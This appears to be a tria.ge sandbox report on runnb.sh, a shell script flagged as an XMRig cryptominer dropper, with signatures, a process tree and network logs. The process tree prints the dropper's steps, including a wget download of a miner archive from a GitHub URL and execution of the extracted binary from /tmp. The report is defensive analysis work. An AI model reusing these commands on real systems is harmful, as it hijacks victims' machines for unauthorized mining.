Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

runnb.sh

ubuntu-20.04-amd64

10

runnb.sh

ubuntu-22.04-amd64

10

runnb.sh

ubuntu-24.04-amd64

10

Analysis

  • max time kernel
    1799s
  • max time network
    1792s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    30/10/2024, 08:21 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    runnb.sh

  • Size

    213B

  • MD5

    a1189543e2f98f6696c6d857b899ab0a

  • SHA1

    30b167128357a05cb5ae4d8bd386d63839d99c4d

  • SHA256

    a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

  • SHA512

    472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score
10/10
xmrig_linuxantivmcredential_accessdefense_evasiondiscoveryminerprivilege_escalation

Malware Config

Signatures

  • Xmrig_linux family
    xmrig_linux
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig_linux
  • Executes dropped EXE 1 IoCs
  • OS Credential Dumping 1 TTPs 1 IoCs

    Adversaries may attempt to dump credentials to use it in password cracking.

    credential_access
  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

    privilege_escalationdefense_evasion
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

    antivm
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

    discovery
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads CPU attributes 1 TTPs 45 IoCs
    discovery
  • Enumerates kernel/hardware configuration 1 TTPs 33 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 36 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 37 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
      PID:1391
      • /usr/bin/sudo
        sudo apt install wget
        2⤵
        • OS Credential Dumping
        • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
        • Reads runtime system information
        PID:1393
        • /usr/bin/apt
          apt install wget
          3⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:1403
          • /usr/bin/dpkg
            /usr/bin/dpkg --print-foreign-architectures
            4⤵
            • Reads runtime system information
            PID:1404
          • /usr/bin/dpkg
            /usr/bin/dpkg --print-foreign-architectures
            4⤵
            • Reads runtime system information
            PID:1441
          • /bin/sh
            /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
            4⤵
              PID:1442
              • /usr/bin/snap
                /usr/bin/snap advise-snap --from-apt
                5⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1443
            • /bin/sh
              /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
              4⤵
                PID:1448
                • /usr/bin/snap
                  /usr/bin/snap advise-snap --from-apt
                  5⤵
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  PID:1449
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                4⤵
                  PID:1454
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:1455
                • /bin/sh
                  /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                  4⤵
                    PID:1460
                    • /usr/bin/snap
                      /usr/bin/snap advise-snap --from-apt
                      5⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:1461
              • /usr/bin/apt
                apt install wget
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:1466
                • /usr/bin/dpkg
                  /usr/bin/dpkg --print-foreign-architectures
                  3⤵
                  • Reads runtime system information
                  PID:1467
                • /usr/bin/dpkg
                  /usr/bin/dpkg --print-foreign-architectures
                  3⤵
                  • Reads runtime system information
                  PID:1468
                • /bin/sh
                  /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                  3⤵
                    PID:1469
                    • /usr/bin/snap
                      /usr/bin/snap advise-snap --from-apt
                      4⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:1470
                  • /bin/sh
                    /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                    3⤵
                      PID:1475
                      • /usr/bin/snap
                        /usr/bin/snap advise-snap --from-apt
                        4⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:1476
                    • /bin/sh
                      /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                      3⤵
                        PID:1481
                        • /usr/bin/snap
                          /usr/bin/snap advise-snap --from-apt
                          4⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:1482
                      • /bin/sh
                        /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                        3⤵
                          PID:1487
                          • /usr/bin/snap
                            /usr/bin/snap advise-snap --from-apt
                            4⤵
                            • Enumerates kernel/hardware configuration
                            • Reads runtime system information
                            PID:1488
                      • /usr/bin/wget
                        wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
                        2⤵
                        • Writes file to tmp directory
                        PID:1493
                      • /usr/bin/tar
                        tar xvf xmrigtar.tar.gz
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:1494
                        • /usr/local/sbin/gzip
                          gzip -d
                          3⤵
                            PID:1495
                          • /usr/local/bin/gzip
                            gzip -d
                            3⤵
                              PID:1495
                            • /usr/sbin/gzip
                              gzip -d
                              3⤵
                                PID:1495
                              • /usr/bin/gzip
                                gzip -d
                                3⤵
                                  PID:1495
                              • /usr/bin/chmod
                                2⤵
                                  PID:1496
                                • /usr/bin/mv
                                  2⤵
                                  • Reads runtime system information
                                  PID:1497
                                • /tmp/xmrig-6.22.0/cool
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks hardware identifiers (DMI)
                                  • Reads hardware information
                                  • Checks CPU configuration
                                  • Reads CPU attributes
                                  • Enumerates kernel/hardware configuration
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:1498

                              Network

                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                                Response
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::196
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::197
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2b
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::96
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::22
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::198
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::24
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::98
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2a
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::97
                              • flag-us
                                DNS
                                github.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                github.com
                                IN A
                                Response
                                github.com
                                IN A
                                20.26.156.215
                              • flag-us
                                DNS
                                github.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                github.com
                                IN AAAA
                                Response
                              • flag-us
                                DNS
                                raw.githubusercontent.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                raw.githubusercontent.com
                                IN A
                                Response
                                raw.githubusercontent.com
                                IN A
                                185.199.110.133
                                raw.githubusercontent.com
                                IN A
                                185.199.109.133
                                raw.githubusercontent.com
                                IN A
                                185.199.108.133
                                raw.githubusercontent.com
                                IN A
                                185.199.111.133
                              • flag-us
                                DNS
                                raw.githubusercontent.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                raw.githubusercontent.com
                                IN AAAA
                                Response
                                raw.githubusercontent.com
                                IN AAAA
                                2606:50c0:8002::154
                                raw.githubusercontent.com
                                IN AAAA
                                2606:50c0:8003::154
                                raw.githubusercontent.com
                                IN AAAA
                                2606:50c0:8001::154
                                raw.githubusercontent.com
                                IN AAAA
                                2606:50c0:8000::154
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                                Response
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::96
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::98
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::198
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2a
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2b
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::22
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::97
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::197
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::196
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::24
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                                Response
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.17
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.96
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.96
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.18
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.49
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.98
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.49
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.48
                              • flag-gb
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                185.125.190.48:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.14.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 16:52:46 GMT
                                x-cache-status: from content-cache-gs2/1
                                x-networkmanager-status: online
                                connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                                Response
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::22
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::96
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::98
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::197
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::24
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::196
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::198
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2b
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::97
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2a
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                                Response
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.49
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.96
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.96
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.98
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.17
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.49
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.18
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.98
                              • flag-us
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                91.189.91.98:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.18.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 16:57:46 GMT
                                x-cache-status: from content-cache/2
                                x-networkmanager-status: online
                                connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                                Response
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::197
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::98
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::196
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::96
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::22
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::97
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::198
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2b
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2a
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::24
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                                Response
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.49
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.96
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.49
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.18
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.96
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.17
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.97
                              • flag-us
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                91.189.91.97:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.18.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 17:02:47 GMT
                                x-cache-status: from content-cache/1
                                x-networkmanager-status: online
                                connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                                Response
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::196
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::96
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::198
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2a
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::22
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::98
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::97
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2b
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::197
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::24
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                                Response
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.96
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.96
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.18
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.48
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.49
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.17
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.49
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-us
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                91.189.91.49:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.14.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 17:08:02 GMT
                                x-cache-status: from content-cache-1ss/1
                                x-networkmanager-status: online
                                connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                                Response
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::24
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::98
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::97
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::196
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2b
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::198
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::96
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::197
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2a
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::22
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                                Response
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.97
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.97
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.96
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.49
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.17
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.96
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.18
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.49
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                              • flag-gb
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                185.125.190.49:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.14.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 17:12:51 GMT
                                x-cache-status: from content-cache-gs2/0
                                x-networkmanager-status: online
                                connection: close
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                                Response
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::196
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::97
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2b
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::24
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::198
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::98
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::96
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::23
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::2a
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4002:1::197
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2620:2d:4000:1::22
                                connectivity-check.ubuntu.com
                                IN AAAA
                                2001:67c:1562::23
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN AAAA
                              • flag-us
                                DNS
                                connectivity-check.ubuntu.com
                                Remote address:
                                1.1.1.1:53
                                Request
                                connectivity-check.ubuntu.com
                                IN A
                                Response
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.17
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.97
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.48
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.49
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.98
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.97
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.98
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.96
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.49
                                connectivity-check.ubuntu.com
                                IN A
                                185.125.190.18
                                connectivity-check.ubuntu.com
                                IN A
                                91.189.91.96
                              • flag-us
                                GET
                                http://connectivity-check.ubuntu.com/
                                Remote address:
                                91.189.91.96:80
                                Request
                                GET / HTTP/1.1
                                Host: connectivity-check.ubuntu.com
                                Accept: */*
                                Connection: close
                                Response
                                HTTP/1.1 204 No Content
                                server: nginx/1.18.0 (Ubuntu)
                                date: Wed, 30 Oct 2024 17:17:46 GMT
                                x-cache-status: from content-cache/0
                                x-networkmanager-status: online
                                connection: close
                              • 20.26.156.215:443
                                github.com
                                tls
                                1.4kB
                                 8.3kB
                                 15
                                12
                              • 185.199.110.133:443
                                raw.githubusercontent.com
                                tls
                                23.3kB
                                 3.7MB
                                 394
                                2696
                              • 168.235.86.33:3393
                                28.0kB
                                 30.4kB
                                 220
                                148
                              • 185.125.190.48:80
                                http://connectivity-check.ubuntu.com/
                                http
                                355 B
                                 405 B
                                 5
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.98:80
                                http://connectivity-check.ubuntu.com/
                                http
                                407 B
                                 401 B
                                 6
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.97:80
                                http://connectivity-check.ubuntu.com/
                                http
                                467 B
                                 401 B
                                 7
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.49:80
                                http://connectivity-check.ubuntu.com/
                                http
                                494 B
                                 405 B
                                 6
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 185.125.190.49:80
                                http://connectivity-check.ubuntu.com/
                                http
                                355 B
                                 405 B
                                 5
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 91.189.91.96:80
                                http://connectivity-check.ubuntu.com/
                                http
                                355 B
                                 401 B
                                 5
                                4

                                HTTP Request

                                GET http://connectivity-check.ubuntu.com/

                                HTTP Response

                                204
                              • 224.0.0.251:5353
                                292 B
                                 4
                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 422 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                2620:2d:4002:1::196
                                2620:2d:4002:1::197
                                2620:2d:4000:1::2b
                                2620:2d:4000:1::96
                                2620:2d:4000:1::22
                                2620:2d:4002:1::198
                                2001:67c:1562::23
                                2001:67c:1562::24
                                2620:2d:4000:1::23
                                2620:2d:4000:1::98
                                2620:2d:4000:1::2a
                                2620:2d:4000:1::97

                              • 1.1.1.1:53
                                github.com
                                dns
                                67 B
                                 83 B
                                 1
                                1

                                DNS Request

                                github.com

                                DNS Response

                                20.26.156.215

                              • 1.1.1.1:53
                                github.com
                                dns
                                67 B
                                 151 B
                                 1
                                1

                                DNS Request

                                github.com

                              • 1.1.1.1:53
                                raw.githubusercontent.com
                                dns
                                82 B
                                 146 B
                                 1
                                1

                                DNS Request

                                raw.githubusercontent.com

                                DNS Response

                                185.199.110.133
                                185.199.109.133
                                185.199.108.133
                                185.199.111.133

                              • 1.1.1.1:53
                                raw.githubusercontent.com
                                dns
                                82 B
                                 194 B
                                 1
                                1

                                DNS Request

                                raw.githubusercontent.com

                                DNS Response

                                2606:50c0:8002::154
                                2606:50c0:8003::154
                                2606:50c0:8001::154
                                2606:50c0:8000::154

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 422 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                2620:2d:4000:1::23
                                2620:2d:4000:1::96
                                2620:2d:4000:1::98
                                2620:2d:4002:1::198
                                2620:2d:4000:1::2a
                                2001:67c:1562::23
                                2620:2d:4000:1::2b
                                2620:2d:4000:1::22
                                2620:2d:4000:1::97
                                2620:2d:4002:1::197
                                2620:2d:4002:1::196
                                2001:67c:1562::24

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 278 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                185.125.190.97
                                185.125.190.17
                                91.189.91.96
                                185.125.190.96
                                185.125.190.98
                                185.125.190.18
                                91.189.91.49
                                91.189.91.98
                                91.189.91.48
                                185.125.190.49
                                91.189.91.97
                                185.125.190.48

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 422 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                2620:2d:4000:1::22
                                2001:67c:1562::23
                                2620:2d:4000:1::23
                                2620:2d:4000:1::96
